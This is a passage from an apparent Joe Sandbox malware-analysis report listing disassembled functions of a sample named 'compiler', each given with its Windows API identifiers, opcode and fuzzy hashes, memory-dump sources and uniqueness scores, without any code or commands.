                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 8e26b6e22723a6992d5cf6bb61c75c5a8d477e86a3ce7f98163c206c192d678d
                                                            • Instruction ID: 7839379df8da110c7287bbf1243d76ce29780c0b8d23151963cef856d81fc4d7
                                                            • Opcode Fuzzy Hash: 8e26b6e22723a6992d5cf6bb61c75c5a8d477e86a3ce7f98163c206c192d678d
                                                            • Instruction Fuzzy Hash: 80519122A0868281FB60BB2D944437DA3E1EB96BA4F944671DFAD022DDDE7CD846C710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD6123C Relevance: 2.6, APIs: 2, Instructions: 80memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
                                                            • Opcode ID: bae88303168c5cef9d0fdd354590dbf6c9939596f79db13f4ec59d6e1d38452c
                                                            • Instruction ID: a1ced624d285b2900e90e4f9a7652cbdf92c64f5f5edfe7c61d83c38dbe6c210
                                                            • Opcode Fuzzy Hash: bae88303168c5cef9d0fdd354590dbf6c9939596f79db13f4ec59d6e1d38452c
                                                            • Instruction Fuzzy Hash: 0C31BE22B05A8681EA04EB29E5143A9B3A5FB65B98F544631DF5E47BECDF3CD0428314
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBCE2C Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 57f93e2b0d4fa1362adbe4cba389f29e518c47b28ce30f630f6c262ec56d645e
                                                            • Instruction ID: 3b8cdd90ef2488d38f4fbbe04d3df9cfcb82353d3256b1c36cba279af4d40883
                                                            • Opcode Fuzzy Hash: 57f93e2b0d4fa1362adbe4cba389f29e518c47b28ce30f630f6c262ec56d645e
                                                            • Instruction Fuzzy Hash: 8E41A132A19345A6FA14BB1CD24027CB7A0FB6A794FD001B1EF5D8769DCF29E422C760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBC714 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 822f8ce673c0b2f1a07bdad3d1c83c6ec04bfeaecd01e3353c5cbfd6a4406734
                                                            • Instruction ID: db44168de558e47ef8688a9337f115ccd147a88882205b6e47024cad56ca329c
                                                            • Opcode Fuzzy Hash: 822f8ce673c0b2f1a07bdad3d1c83c6ec04bfeaecd01e3353c5cbfd6a4406734
                                                            • Instruction Fuzzy Hash: F2318122A0864295F7017B1CC4853BCA6A1EBA6BA1FD106B5EF1D033DECF7CA4418731
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBFCFC Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 1bda166fc813c29b1f20e6ab1364efe55f8e1ad080311d4be5ce0ebfa1582f78
                                                            • Instruction ID: a0ee4b3b17c57aecbef81d4567c59f282af4fec21fd3a67106c47cef6322bb00
                                                            • Opcode Fuzzy Hash: 1bda166fc813c29b1f20e6ab1364efe55f8e1ad080311d4be5ce0ebfa1582f78
                                                            • Instruction Fuzzy Hash: 9821B332A0874296EB61BF1CE440369B2A0EBA9B54FD44234EB5D476DDDF3CD404CB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADA98AC Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: 724a263dbdd2d86cab5f7086dc6f214ea611ede805b9cedff16d4e2e8c92b1c1
                                                            • Instruction ID: f08b1e709d640acc5de79af17d0109cc6d995968c7decf1d6eb26f0f989f0374
                                                            • Opcode Fuzzy Hash: 724a263dbdd2d86cab5f7086dc6f214ea611ede805b9cedff16d4e2e8c92b1c1
                                                            • Instruction Fuzzy Hash: 66215732E04A019AFB61AF68C4413AC72B4FB59708F94953ADB4C03B8DDF78D585CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADA9D60 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 580811a3565ad28ea20fd9cc29d99a7b25fd50730e80ae556cf2d352e9ef3e3b
                                                            • Instruction ID: e0be3554d7cdb4b2e727448076188fc71c4ce88ab83ab28ab24319ead7e63827
                                                            • Opcode Fuzzy Hash: 580811a3565ad28ea20fd9cc29d99a7b25fd50730e80ae556cf2d352e9ef3e3b
                                                            • Instruction Fuzzy Hash: 3A117F22A1CA8145FF51BA1ED4403BDE690EFA6B80FD444B1EF4D0778EDE2DD8409720
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADAA01C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: fb870124435ae2ffa34f9d2e87bf91ca634b1af0b08d714845b5345674d131ac
                                                            • Instruction ID: eb3326757e025651f2ca421f3cf38bf1261e9611a47b917cee55c14dcc638049
                                                            • Opcode Fuzzy Hash: fb870124435ae2ffa34f9d2e87bf91ca634b1af0b08d714845b5345674d131ac
                                                            • Instruction Fuzzy Hash: 8101A521B08B4145FA04BB5A9901179E695FBA6FE0F8846B1DF5C53BEECE3CE4014314
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC57E8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 597293c520aa27ca84cd34f7f2eb45b513c619379471ebe7983a0f12d304b766
                                                            • Instruction ID: e7086e10bc5e0001bc7d5a13d512853dab49d1535a766d852f678589dbbdea65
                                                            • Opcode Fuzzy Hash: 597293c520aa27ca84cd34f7f2eb45b513c619379471ebe7983a0f12d304b766
                                                            • Instruction Fuzzy Hash: D6116032D5964282F304BB1CA4501A9E2A0EF62740FC545B4EF9E4779EEF3CF9108BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBBB1C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d000f18690e13f5ce1a8ec127c74ba38e1add1aad031dcb17bc056ae646fe5f1
                                                            • Instruction ID: b3255871e9dc7afe4ecbb0bf36f848ea7a35f97bf22da4cf4d4781522a8581fd
                                                            • Opcode Fuzzy Hash: d000f18690e13f5ce1a8ec127c74ba38e1add1aad031dcb17bc056ae646fe5f1
                                                            • Instruction Fuzzy Hash: D7116A6290874692FB04BF58D5983ADF7A1EBA2750FD042B2EB4D0269DCF7CE000CB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADA9B64 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 90166c9835b0c4c51ee13467014d825b9562ac36eae18fe4d0f9901fa26200bf
                                                            • Instruction ID: d83282883ae232af78e28a242a279f6430a726020d347fea75ad833fed4d3af7
                                                            • Opcode Fuzzy Hash: 90166c9835b0c4c51ee13467014d825b9562ac36eae18fe4d0f9901fa26200bf
                                                            • Instruction Fuzzy Hash: 48011A23E0924641FB54BA7ED49537D9150DFA6764FE407B0EF29863CECE3CE4114221
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7638 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7BADB92D1,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB768D
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 582a5129bda8a8c2104ea0b53cca45d45fa316271d7bb51556f5cbd7bf73f1ef
                                                            • Instruction ID: 060f93cd43c51862a12c494a5d95fcf43229f7970c0b3b2fc2cd87b1dfe56297
                                                            • Opcode Fuzzy Hash: 582a5129bda8a8c2104ea0b53cca45d45fa316271d7bb51556f5cbd7bf73f1ef
                                                            • Instruction Fuzzy Hash: 04F04F54F0A30762FE98766D94512B4D285DFAA780FC844B0EF1E8638DED2CE4418130
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADA9BE8 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: d74b901cdacf2acf7ee8e6a854eaba567127bf4bdb37b8e12480798732d393a3
                                                            • Instruction ID: 6b2695df0aaa65dc0ee9fd604f89debc5737be75d7131484e6bdfcab9847d61a
                                                            • Opcode Fuzzy Hash: d74b901cdacf2acf7ee8e6a854eaba567127bf4bdb37b8e12480798732d393a3
                                                            • Instruction Fuzzy Hash: 34F03021A4864291FB14B76DE5412BDA290DF66790FA40670FF19463CEDE2CE4418625
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3DE34 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _fread_nolock_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2335118202-0
                                                            • Opcode ID: 94851e265943e6c49cd8ff8245fae306f007dcfc6302c70bab685688354d5886
                                                            • Instruction ID: 6a177996bed73d373d4c471a1346d1657e585c67f1280243950334f6cb3cec56
                                                            • Opcode Fuzzy Hash: 94851e265943e6c49cd8ff8245fae306f007dcfc6302c70bab685688354d5886
                                                            • Instruction Fuzzy Hash: 51F06D26708B4280FB10EF12E88066AA6A4EB99BC0F584471EFDD53B5DCE3CD4528710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB89E8 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7BADBA271,?,?,?,00007FF7BADA9040,?,?,?,00007FF7BADA9006,?,?,?,00007FF7BADA918D), ref: 00007FF7BADB8A26
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 8700524d8f8de708cc1d1f87a8807334b3a2e60fe43f96bdb65c22308d0fe0a3
                                                            • Instruction ID: af8e9a09e5e970d9443c96bc64eea11bcfd2a435c7d668aebbc9bcd76918dca8
                                                            • Opcode Fuzzy Hash: 8700524d8f8de708cc1d1f87a8807334b3a2e60fe43f96bdb65c22308d0fe0a3
                                                            • Instruction Fuzzy Hash: 02F05850F0C347A4FF547AA9A801678D190CFAA7A0FC846B4EF2E862CDEE6CA54141B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD61388 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7BAD45B5A), ref: 00007FF7BAD613B5
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: fa120db0a0b702d850e342ae5cbf655343c1bd021f5caf75497a9e9138da7b56
                                                            • Instruction ID: 910c30e3820a2002584cfe6416725b65c544becece892c74d09ec53b667edff2
                                                            • Opcode Fuzzy Hash: fa120db0a0b702d850e342ae5cbf655343c1bd021f5caf75497a9e9138da7b56
                                                            • Instruction Fuzzy Hash: 44F0A726A1898581E714AF5EE0401EDB390EB94B84F5C5036EF0E4BA18CF39D4418710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3D1EC Relevance: 1.4, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 59c6b0c580812ade2945f46e9e24fd6b58a27c07793cd74858015b983e3624fe
                                                            • Instruction ID: e2da1229bb4c1a68e10836d1513fa4f8bda3c3062178d6fb3edc89851c2bca27
                                                            • Opcode Fuzzy Hash: 59c6b0c580812ade2945f46e9e24fd6b58a27c07793cd74858015b983e3624fe
                                                            • Instruction Fuzzy Hash: 37410572A0468586EB21FF29D4442ADB3A0FB56BA4F944671DFAD0B3DDCE38E446C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3DB08 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: strchr
                                                            • String ID:
                                                            • API String ID: 2830005266-0
                                                            • Opcode ID: 450607d1b605485776c4d278a7cc012f3fbf1fc3d66f21bdd29c06802d71596d
                                                            • Instruction ID: 9d7d5f79172e3a827a6ffea97455c59d6c00f8178ae66a94f64bc2c636264c65
                                                            • Opcode Fuzzy Hash: 450607d1b605485776c4d278a7cc012f3fbf1fc3d66f21bdd29c06802d71596d
                                                            • Instruction Fuzzy Hash: 69119022A05B4241FA14BB66E55427DA3A1EB99BD0F988670EF5D47B8DCE3CD4518310
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD35074 Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                            • Instruction ID: d91a1f7b065fc4423a5ac74f19fd944e7be98460ce17e839e83249e97f61ce29
                                                            • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                            • Instruction Fuzzy Hash: 3C011926604A8489E705AF3EC4504ACB7A4FB19F8DB084265DF896736CEF26D545C750
                                                            Uniqueness

